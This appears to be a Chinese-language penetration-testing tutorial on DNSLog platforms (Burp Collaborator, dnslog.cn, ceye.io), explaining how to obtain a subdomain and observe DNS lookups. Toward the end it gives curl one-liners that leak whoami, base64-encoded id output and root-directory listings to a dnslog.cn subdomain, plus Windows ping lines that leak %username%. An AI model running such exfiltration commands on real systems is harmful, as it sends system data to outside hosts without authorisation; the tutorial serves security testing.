常用DNSLog平台
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台,DNSLog的平台非常的多,但是实际上大部分的DNSLog的平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
Burp Collaborator
首先我们从BurpSuite里面自带的一个工具开始讲起,它是集成在BurpSuite工具里面的,非常方便我们去做渗透测试的时候使用。
第一步,我们点击选项菜单栏中的 Project options
第二步,在 Burp Collaborator Server 选项框中点击 Run health check进行DNSLog服务器连通性的检查
以下画面是检测正常的情况
第三步,点击 Burp 选项栏下的 Burp Collaborator client
进入到以下的界面,点击 Copy to clipboard,复制到粘贴板,这时 BurpSuite的DNSLog服务器会分配给我们一个子域名
我们打开笔记本,按 CTRL + v 便可以粘贴处分配给我们的子域名
现在我们打开 cmd ,去 ping 这个分配给我们的子域名地址,并随便加上一点前缀
然后我们回到页面,点击 Pollnow,
这时,我们便可以看到DNSLog平台回应给我们的解析记录了
dnslog.cn
dnslog.cn是我们国内目前最知名的DNSLog服务平台,也是最常用的DNSLog服务平台,注意使用时使用HTTP协议访问,DNSLog的平台
点击 Get SubDomain获取一个子域名,比如我们这里得到的子域名就是 6rvp56.dnslog.cn
然后我们打开 cmd 去 ping 这个子域名,这里我们在子域名前面随便加上一点前缀
这时,我们回到DNSLog的平台,点击 Refresh Record刷新,会发现已经产生了DNSLog的记录
如果我们想要通过DNSLog平台得到一些系统的信息,那么该怎么办呢?
我们重新点击 Get SubDomain获取一个子域名,比如我们这里得到新的子域名就 j11s5c.dnslog.cn
然后我们打开 cmd 去 ping 这个子域名,这里我们在子域名前面加上一些前缀,比如%username%
然后点击 Refresh Record刷新
这时DNSLog服务平台会响应给我们一些解析记录,比如%username%环境变量
以下是更多的一些Windows的系统环境变量,大家可以自己实验试试
在Linux系统下,大家可以使用以下的语句去测试
#获取变量值:
curl http://`whoami`.xxxxxx.dnslog.cn/
#base64编码输出:
curl http://$(id|base64).xxxxxx.dnslog.cn/
#循环获取文件输出:
for i in $(ls /);do curl
"http://$i.xxxxxx.dnslog.cn/";done;
ceye.io
我们在使用dnslog.cn平台时,会发现有两个缺点,一是dnslog.cn平台所使用的解析记录是不持久保存的,一旦我们关闭了该界面,我们的解析记录就会消失,二是dnslog.cn平台只能支持我们去复制粘贴解析记录的结果,没办法大规模解析和提取我们想要的结果,所以,我们现在去使用一个更高级的DNSLog服务解析平台 ceye.io,它是由知道创宇安全公司推出的一款产品,它很好的解决了我们之前提到的两个问题。
ceye.io有以下特点:
一、提供给我们固定子域名,不会变动
二、DNS解析记录会在账号下保存,不会动不动就消失
三、提供在线API,可以使用各种编程语言调用
我们打开主界面点击 Profile 就可以得到我们相应的信息,这里需要我们提前去绑定手机号和邮箱,否则无法使用
Identifier就是提供给我们的个人固定专属的子域名
那么我们该如何使用呢?我们现在打开cmd,去 ping 我们的子域名并且随便加上一点前缀
然后我们在 DNS Query 便可以看到DNS服务器响应给我们的解析记录,这些解析记录可以保存最多6个小时和最近的100条记录
2498
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
